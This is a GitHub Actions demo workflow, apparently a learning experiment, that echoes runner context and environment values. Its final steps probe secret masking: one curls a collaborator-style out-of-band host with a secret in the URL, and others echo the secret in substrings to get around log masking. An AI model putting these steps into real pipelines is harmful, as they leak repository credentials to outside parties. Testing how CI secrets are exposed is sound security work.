name: Github Actions Demo
run-name: ${{ github.actor }} is testing out Github Actions 🚀
on: [push]
env: 
  MY_SECRET: env_secret
  MY_VARIABLE: env_variable
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo  "This job was triggered by  a ${{ github.event_name }} event"
      - run: echo "this job is running on ${{ runner.os }} server hosted by Github"
      - run: echo "the name of your branch is ${{ github.ref }} and your repositoruy is ${{ github.repository }}."
      - name: Check out repository code
        uses: actions/checkout@v3
      - run: echo "The ${{ github.repository }} repository has been cloned to the runner"
      - run: echo "The workflow is now ready to test your code on the runner"
      - name: List Files in Directory
        run: |
          ls ${{ github.workspace }}
      - run: echo "This job's status is ${{ job.status }}"
      - run: echo "this is my secret, $MY_SECRET"
      - run: echo "this si my variable, $MY_VARIABLE"
      - run: echo "secret, ${{ vars.MY_SECRET }}. variable, ${{ vars.MY_VARIABLE }}" # From this we see that the secret is masked from the output
      - run: curl jg3yql9w2f7uvfa15gcj5xft2k8bw2kr.bcollaborator.binsec.cloud/${{ vars.MY_SECRET }} # its actually not here either, so what can we use the secrets for?
      - run: echo "${MY_SECRET:0:1}"; echo "${MY_SECRET:1:6}"
      - run: echo "secret, ${{ vars.MY_SECRET:0:2 }}"; echo "secret,part2 ${{ vars.MY_SECRET:2:4}}"
